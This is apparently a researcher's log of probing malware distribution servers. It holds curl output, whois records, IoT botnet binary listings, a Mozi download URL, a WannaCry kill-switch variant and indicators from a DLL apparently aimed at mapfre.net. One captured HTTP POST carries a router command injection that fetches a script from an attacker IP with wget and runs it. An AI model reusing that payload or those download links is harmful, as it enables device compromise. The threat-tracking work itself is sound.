last-modified:  2021-06-08T10:29:40Z
source:         RIPE # Filtered
$ curl -i http://45.90.160.54/
HTTP/1.1 403 Forbidden
Date: Sat, 09 Apr 2022 08:06:38 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
Index of /bins

[ICO]          Name        Last modified   Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                     -  
[   ]       onion002.arm     2022-04-06 01:30  24K  
[   ]       onion002.arm5    2022-04-06 01:30  22K  
[   ]       onion002.arm6    2022-04-06 01:30  29K  
[   ]       onion002.arm7    2022-04-06 01:30  48K  
[   ]       onion002.m68k    2022-04-06 01:30  52K  
[   ]       onion002.mips    2022-04-06 01:30  26K  
[   ]       onion002.mpsl    2022-04-06 01:30  27K  
[   ]       onion002.ppc     2022-04-06 01:30  23K  
[   ]       onion002.sh4     2022-04-06 01:30  50K  
[   ]       onion002.spc     2022-04-06 01:30  59K  
[   ]       onion002.x86     2022-04-06 01:30  24K  
══════════════════════════════════════════════════════════════
lftp 45.90.160.54
lftp 45.90.160.54:~> ls
-rwxr-xr-x    1 0        0           25004 Apr 06 01:30 onion002.arm
-rwxr-xr-x    1 0        0           22132 Apr 06 01:30 onion002.arm5
-rwxr-xr-x    1 0        0           29464 Apr 06 01:30 onion002.arm6
-rwxr-xr-x    1 0        0           48688 Apr 06 01:30 onion002.arm7
-rwxr-xr-x    1 0        0           53052 Apr 06 01:30 onion002.m68k
-rwxr-xr-x    1 0        0           26168 Apr 06 01:30 onion002.mips
-rwxr-xr-x    1 0        0           27244 Apr 06 01:30 onion002.mpsl
-rwxr-xr-x    1 0        0           23944 Apr 06 01:30 onion002.ppc
-rwxr-xr-x    1 0        0           51584 Apr 06 01:30 onion002.sh4
-rwxr-xr-x    1 0        0           60412 Apr 06 01:30 onion002.spc
-rwxr-xr-x    1 0        0           24728 Apr 06 01:30 onion002.x86
-rw-r--r--    1 0        0            2007 Apr 06 01:39 sora1.sh
$ curl -i http://45.90.160.54/bins/
HTTP/1.1 200 OK
Date: Sat, 09 Apr 2022 08:05:28 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 3053
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /bins</title>
 </head>
 <body>
<h1>Index of /bins</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a>       </td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.arm">onion002.arm</a>           </td><td align="right">2022-04-06 01:30  </td><td align="right"> 24K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.arm5">onion002.arm5</a>          </td><td align="right">2022-04-06 01:30  </td><td align="right"> 22K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.arm6">onion002.arm6</a>          </td><td align="right">2022-04-06 01:30  </td><td align="right"> 29K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.arm7">onion002.arm7</a>          </td><td align="right">2022-04-06 01:30  </td><td align="right"> 48K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.m68k">onion002.m68k</a>          </td><td align="right">2022-04-06 01:30  </td><td align="right"> 52K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.mips">onion002.mips</a>          </td><td align="right">2022-04-06 01:30  </td><td align="right"> 26K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.mpsl">onion002.mpsl</a>          </td><td align="right">2022-04-06 01:30  </td><td align="right"> 27K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.ppc">onion002.ppc</a>           </td><td align="right">2022-04-06 01:30  </td><td align="right"> 23K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.sh4">onion002.sh4</a>           </td><td align="right">2022-04-06 01:30  </td><td align="right"> 50K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.spc">onion002.spc</a>           </td><td align="right">2022-04-06 01:30  </td><td align="right"> 59K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.x86">onion002.x86</a>           </td><td align="right">2022-04-06 01:30  </td><td align="right"> 24K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
</body></html>

107.174.137.24

$ curl -i 107.174.137.24
HTTP/1.1 403 Forbidden
Date: Sat, 09 Apr 2022 08:49:48 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
NetRange:       107.172.0.0 - 107.175.255.255
CIDR:           107.172.0.0/14
NetName:        CC-17
NetHandle:      NET-107-172-0-0-1
Parent:         NET107 (NET-107-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS36352
Organization:   ColoCrossing (VGS-9)
RegDate:        2013-12-27
Updated:        2013-12-27
Ref:            https://rdap.arin.net/registry/ip/107.172.0.0

OrgName:        ColoCrossing
OrgId:          VGS-9
Address:        325 Delaware Avenue
Address:        Suite 300
City:           Buffalo
StateProv:      NY
PostalCode:     14202
Country:        US
RegDate:        2005-06-20
Updated:        2019-10-17
Ref:            https://rdap.arin.net/registry/entity/VGS-9

51.81.133.91

% No abuse contact registered for 51.81.0.0 - 51.81.255.255

inetnum:        51.81.0.0 - 51.81.255.255
netname:        NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
descr:          IPv4 address block not managed by the RIPE NCC
remarks:        ------------------------------------------------------
remarks:
remarks:        For registration information,
remarks:        you can consult the following sources:
remarks:
remarks:        IANA
remarks:        http://www.iana.org/assignments/ipv4-address-space
remarks:        http://www.iana.org/assignments/iana-ipv4-special-registry
remarks:        http://www.iana.org/assignments/ipv4-recovered-address-space
remarks:
remarks:        AFRINIC (Africa)
remarks:        http://www.afrinic.net/ whois.afrinic.net
remarks:
remarks:        APNIC (Asia Pacific)
remarks:        http://www.apnic.net/ whois.apnic.net
remarks:
remarks:        ARIN (Northern America)
remarks:        http://www.arin.net/ whois.arin.net
remarks:
remarks:        LACNIC (Latin America and the Carribean)
remarks:        http://www.lacnic.net/ whois.lacnic.net
remarks:
remarks:        ------------------------------------------------------
country:        EU # Country is really world wide
admin-c:        IANA1-RIPE
tech-c:         IANA1-RIPE
status:         ALLOCATED UNSPECIFIED
mnt-by:         RIPE-NCC-HM-MNT
created:        2019-03-11T16:33:15Z
last-modified:  2019-03-11T16:33:15Z
source:         RIPE
$ curl -i http://51.81.133.91/
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2022 04:04:33 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 12 Apr 2022 03:23:12 GMT
ETag: "13-5dc6c94b3bfe0"
Accept-Ranges: bytes
Content-Length: 19
Content-Type: text/html; charset=UTF-8

MTM v2.6 Was here.
$ curl -i http://51.81.133.91/FKKK/
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2022 04:03:39 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 12 Apr 2022 03:23:12 GMT
ETag: "4-5dc6c94b3bfe0"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html; charset=UTF-8

Hey
$ curl -i stresser.pw
HTTP/1.1 301 Moved Permanently
Date: Fri, 22 Apr 2022 04:22:04 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Fri, 22 Apr 2022 05:22:04 GMT
Location: https://cryptostresser.com
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=egX7%2FmZbvSA5f2fWJV6HNhnKrExpq9%2FCmooO%2BRh%2Fg7X3ob47VGICKg1WiLzyr8I21XGICczFb3asyHsCBq%2BCc7Bp8PmUFmUHOqoZavSiezgUVCZEjfaGnQ1wzki6dQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6ffb93886f537762-LHR
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

https://documents.trendmicro.com/assets/pdf/APPENDIX_Back-to-Back%20Campaigns.pdf

163.179.162.206

inetnum:        163.179.0.0 - 163.179.255.255
netname:        UNICOM-GD
descr:          China Unicom Guangdong province network
descr:          China Unicom
country:        CN
admin-c:        CH1302-AP
tech-c:         RP181-AP
remarks:        service provider
mnt-by:         APNIC-HM
mnt-lower:      MAINT-CNCGROUP-GD
mnt-routes:     MAINT-CNCGROUP-RR
mnt-irt:        IRT-CU-CN
status:         ALLOCATED PORTABLE
remarks:        --------------------------------------------------------
remarks:        To report network abuse, please contact mnt-irt
remarks:        For troubleshooting, please contact tech-c and admin-c
remarks:        Report invalid contact via www.apnic.net/invalidcontact
remarks:        --------------------------------------------------------
last-modified:  2016-05-04T00:30:26Z
source:         APNIC

irt:            IRT-CU-CN
address:        No.21,Financial Street
address:        Beijing,100033
address:        P.R.China
e-mail:         hqs-ipabuse@chinaunicom.cn
abuse-mailbox:  hqs-ipabuse@chinaunicom.cn
admin-c:        CH1302-AP
tech-c:         CH1302-AP
auth:           # Filtered
mnt-by:         MAINT-CNCGROUP
last-modified:  2017-10-23T05:59:13Z
source:         APNIC

person:         ChinaUnicom Hostmaster
nic-hdl:        CH1302-AP
e-mail:         hqs-ipabuse@chinaunicom.cn
address:        No.21,Jin-Rong Street
address:        Beijing,100033
address:        P.R.China
phone:          +86-10-66259764
fax-no:         +86-10-66259764
country:        CN
mnt-by:         MAINT-CNCGROUP
last-modified:  2017-08-17T06:13:16Z
source:         APNIC

person:         runkeng pan
nic-hdl:        RP181-AP
e-mail:         gdipnoc@chinaunicom.cn
address:        XinShiKong Plaza,No 666 Huangpu Rd. Guangzhou 510627,China
phone:          +86-20-22214174
fax-no:         +86-20-22212266-4174
country:        CN
mnt-by:         MAINT-CNCGROUP-GD
last-modified:  2015-12-16T03:32:02Z
source:         APNIC
$ curl -i http://163.179.162.206:38334/Mozi.m
HTTP/1.1 200 OK
Server: nginx
Content-Length: 108808
Connection: close
Content-Type: application/zip

23.95.186.164

From HTTP POST:

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=$(busybox+wget+http://23.95.186.164/cache+-O+->+/dev/.p;sh+/dev/.p)&ipv=0
NetRange:       23.94.0.0 - 23.95.255.255
CIDR:           23.94.0.0/15
NetName:        CC-16
NetHandle:      NET-23-94-0-0-1
Parent:         NET23 (NET-23-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS36352
Organization:   ColoCrossing (VGS-9)
RegDate:        2013-08-16
Updated:        2013-08-16
Ref:            https://rdap.arin.net/registry/ip/23.94.0.0

OrgName:        ColoCrossing
OrgId:          VGS-9
Address:        325 Delaware Avenue
Address:        Suite 300
City:           Buffalo
StateProv:      NY
PostalCode:     14202
Country:        US
RegDate:        2005-06-20
Updated:        2019-10-17
Ref:            https://rdap.arin.net/registry/entity/VGS-9
$ curl -i http://23.95.186.164
HTTP/1.1 403 Forbidden
Date: Tue, 26 Apr 2022 21:36:50 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
        <title>Apache HTTP Server Test Page powered by CentOS</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

107.175.215.224

NetRange:       107.172.0.0 - 107.175.255.255
CIDR:           107.172.0.0/14
NetName:        CC-17
NetHandle:      NET-107-172-0-0-1
Parent:         NET107 (NET-107-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS36352
Organization:   ColoCrossing (VGS-9)
RegDate:        2013-12-27
Updated:        2013-12-27
Ref:            https://rdap.arin.net/registry/ip/107.172.0.0

OrgName:        ColoCrossing
OrgId:          VGS-9
Address:        325 Delaware Avenue
Address:        Suite 300
City:           Buffalo
StateProv:      NY
PostalCode:     14202
Country:        US
RegDate:        2005-06-20
Updated:        2019-10-17
Ref:            https://rdap.arin.net/registry/entity/VGS-9
$ curl -i 107.175.215.224
HTTP/1.1 403 Forbidden
Date: Wed, 04 May 2022 01:07:51 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

61.177.137.133

keikaku doori!
inetnum:        61.177.137.128 - 61.177.137.135
netname:        wuxi-Freshwater-Fisheries-Center
descr:          wuxi Freshwater Fisheries Research Center
descr:          Wuxi City
descr:          Jiangsu Province
country:        CN
admin-c:        CH456-AP
tech-c:         CH456-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-CHINANET-JS
mnt-lower:      MAINT-CHINANET-JS-WX
last-modified:  2010-07-22T01:52:02Z
source:         APNIC

person:         CHINANET-JS-WX Hostmaster
address:        No.3,Jiankang Road,Wuxi 214001
country:        CN
phone:          +86-510-2730813
fax-no:         +86-510-2700519
e-mail:         jsipmanager@163.com
nic-hdl:        CH456-AP
remarks:        send anti-spam or abuse reports to jsipmanager@163.com
remarks:        times in GMT+8
mnt-by:         MAINT-CHINANET-JS-WX
last-modified:  2022-03-15T07:12:25Z
source:         APNIC
$ curl -i http://61.177.137.133/x/
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 961
Date: Wed, 04 May 2022 02:34:58 GMT

<html><head><title>Apache Tomcat/7.0.26 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /x/</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/x/</u></p><p><b>description</b> <u>The requested resource (/x/) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.26</h3></body></html>

213.232.235.203

inetnum:        213.232.235.128 - 213.232.235.255
org:            ORG-AS895-RIPE
netname:        AlexHost
country:        MD
admin-c:        SZ3268-RIPE
tech-c:         SZ3268-RIPE
status:         ASSIGNED PA
mnt-by:         IPSMAIN
created:        2021-10-07T15:25:09Z
last-modified:  2021-10-07T15:25:09Z
source:         RIPE
mnt-domains:    CLOUDATAMD-MNT
mnt-lower:      CLOUDATAMD-MNT
mnt-routes:     CLOUDATAMD-MNT

organisation:   ORG-AS895-RIPE
org-name:       ALEXHOST SRL
org-type:       OTHER
address:        str. C. Brancusi nr. 3, Chisinau, Moldova
abuse-c:        AR18916-RIPE
mnt-ref:        MNT-GLBTX
mnt-ref:        FREENET-MNT
mnt-ref:        IPSMAIN
mnt-by:         IPSMAIN
created:        2021-02-08T19:58:24Z
last-modified:  2022-03-09T16:27:19Z
source:         RIPE # Filtered
$ curl -i http://213.232.235.203/
HTTP/1.1 403 Forbidden
Date: Thu, 05 May 2022 18:20:52 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
Content-Length: 202
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
</body></html>

New WannaCry variant link

Original sinkholed link:

http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Variant link:

http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com

Mostly just Chinese porn. Strange way of bypassing detections I guess, but not sure what the point is. Only very obscure security researchers are ever going to see this link…

Attack on mapfre.net

MD5 Hash: 0e4fd3b90dbfb706f38d70af3e28d752

SHA1 Hash: e5c2991a028bebe5c086836fa2d9f7769c3de189

SHA256 Hash: de106db86e26b873be1611b5b7fa2ec4113044bef7dfafb2a6f557fa752d8c3c

File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

VirusTotal First Spotted: 2021-12-02 21:51:07 UTC

https://www.virustotal.com/gui/file/de106db86e26b873be1611b5b7fa2ec4113044bef7dfafb2a6f557fa752d8c3c

Strings from inside:

cisco
FFDDADADACACACACACACACACACABN
SMB%
\MAILSLOT\BROWSE
PDM000900-V7388
scaneo de VDI
pdm000900-v1763
mapfre
MSFT 5.0
'_discovery20081
prop.key.msg_type
#prop.val.rply.p2p.content_discovery
pdm000900-v1717<
MSFT 5.07
</head><body>
<h1>Not Found</h1>
<p>The requested URL /wpad.dat was not found on this server.</p>
<hr>
<address>Apache/2.2.15 (Oracle) Server at 10.231.177.21 Port 80</address>
</body></html>
0273740
name1
VirtualesPDM0
objectGUID1
objectCategory1
BCN=Organizational-Unit,CN=Schema,CN=Configuration,DC=mapfre,DC=net0
gPLink1
[LDAP://cn={68D681C2-6B9B-4751-B74A-A0CE85A62686},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0][LDAP://cn={F833F8E0-5756-4715-B2A4-A66A09951C53},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0][LDAP://cn={34C5D7E9-7B59-4F93-A24C-DDEB1AB0223A},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0][LDAP://cn={9C943BCF-0686-4064-B3FE-6F1593EBFF0A},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0][LDAP://cn={22A49EF3-1C54-41B8-BA4D-B1C25B8F869E},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0]0

As you can see, this is a very specific LDAP string. “es.mapfre.net”. Just typing “mapfre.net” redirects to “mapfre.com”, with default language Spanish, so it's likely a directly targeted LDAP attack of some kind on them. I'm assuming this already swung around to their attention given they've moved entirely off the mapfre.net domain, but who knows what their internal LDAP structure is like (those are hard to migrate due to internal applications…). I'm sure whatever vulnerability this exploits has been addressed, though.

The 404 embedded 10.231.177.21 response makes me think it poses as an HTTP server. This attack has quite a large quantity of knowledge about the internal structure of their enterprise architecture.

jx.qingdaosheng.com

$ curl -i jx.qingdaosheng.com
HTTP/1.1 200 OK
Date: Tue, 10 May 2022 18:54:28 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Wed, 13 Apr 2022 12:35:57 GMT
ETag: "0-5dc886b50fe98"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
jx.qingdaosheng.com.    154 IN  A   156.234.211.155
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
unstable_is_the_history_of_universe

2.56.57.98

GOLDFISHGANG
inetnum:        2.56.56.0 - 2.56.57.255
netname:        SERVER-2-56-56-0
country:        NL
org:            ORG-SB666-RIPE
admin-c:        SBAH21-RIPE
tech-c:         SBAH21-RIPE
status:         ASSIGNED PA
mnt-by:         PREFIXBROKER-MNT
created:        2021-05-03T18:09:59Z
last-modified:  2021-05-03T18:09:59Z
source:         RIPE

organisation:   ORG-SB666-RIPE
org-name:       Serverion BV
org-type:       OTHER
address:        Krammer 8
address:        3232HE Brielle
address:        Netherlands
abuse-c:        SBAH21-RIPE
mnt-ref:        PREFIXBROKER-MNT
mnt-by:         PREFIXBROKER-MNT
created:        2021-05-03T18:09:58Z
last-modified:  2021-05-03T18:09:58Z
source:         RIPE # Filtered

v1.kannimanelaji.com

v1.kannimanelaji.com.   600 IN  A   156.226.173.28
$ curl -i v1.kannimanelaji.com
HTTP/1.1 200 OK
Date: Fri, 13 May 2022 06:08:03 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 10 May 2022 15:22:55 GMT
ETag: "0-5dea9e625c6c5"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8

156.226.173.28

inetnum:        156.226.173.0 - 156.226.173.255
netname:        ICIDC_Limited
descr:          ICIDC Limited
country:        HK
admin-c:        CIS1-AFRINIC
tech-c:         CIS1-AFRINIC
status:         ASSIGNED PA
mnt-by:         CIL1-MNT
source:         AFRINIC # Filtered
parent:         156.224.0.0 - 156.255.255.255

person:         Cloud Innovation Support
address:        Ebene
address:        MU
address:        Mahe
address:        Seychelles
phone:          tel:+248-4-610-795
nic-hdl:        CIS1-AFRINIC
abuse-mailbox:  abuse@cloudinnovation.org
mnt-by:         CIL1-MNT
source:         AFRINIC # Filtered
$ curl -i http://156.226.173.28
HTTP/1.1 200 OK
Date: Fri, 13 May 2022 06:06:35 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 10 May 2022 15:22:55 GMT
ETag: "0-5dea9e625c6c5"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8

104.168.46.103

lzrd cock fest"/proc/"/exe
$ curl -i http://104.168.46.103/
HTTP/1.1 200 OK
Date: Fri, 13 May 2022 22:06:42 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 12 May 2022 19:38:40 GMT
ETag: "eb-5ded5b479d753"
Accept-Ranges: bytes
Content-Length: 235
Content-Type: text/html; charset=UTF-8

<html>
 <body>
 <title>EAT MY BINS :)</title>
  <p><img src="bins.jpg"
  width = "1000"
  height = "500" </p>

 <audio src="meme1.mp3" controls autoplay />
 <body style="background-color:green">

</html>
</body>
</html>

Image is here: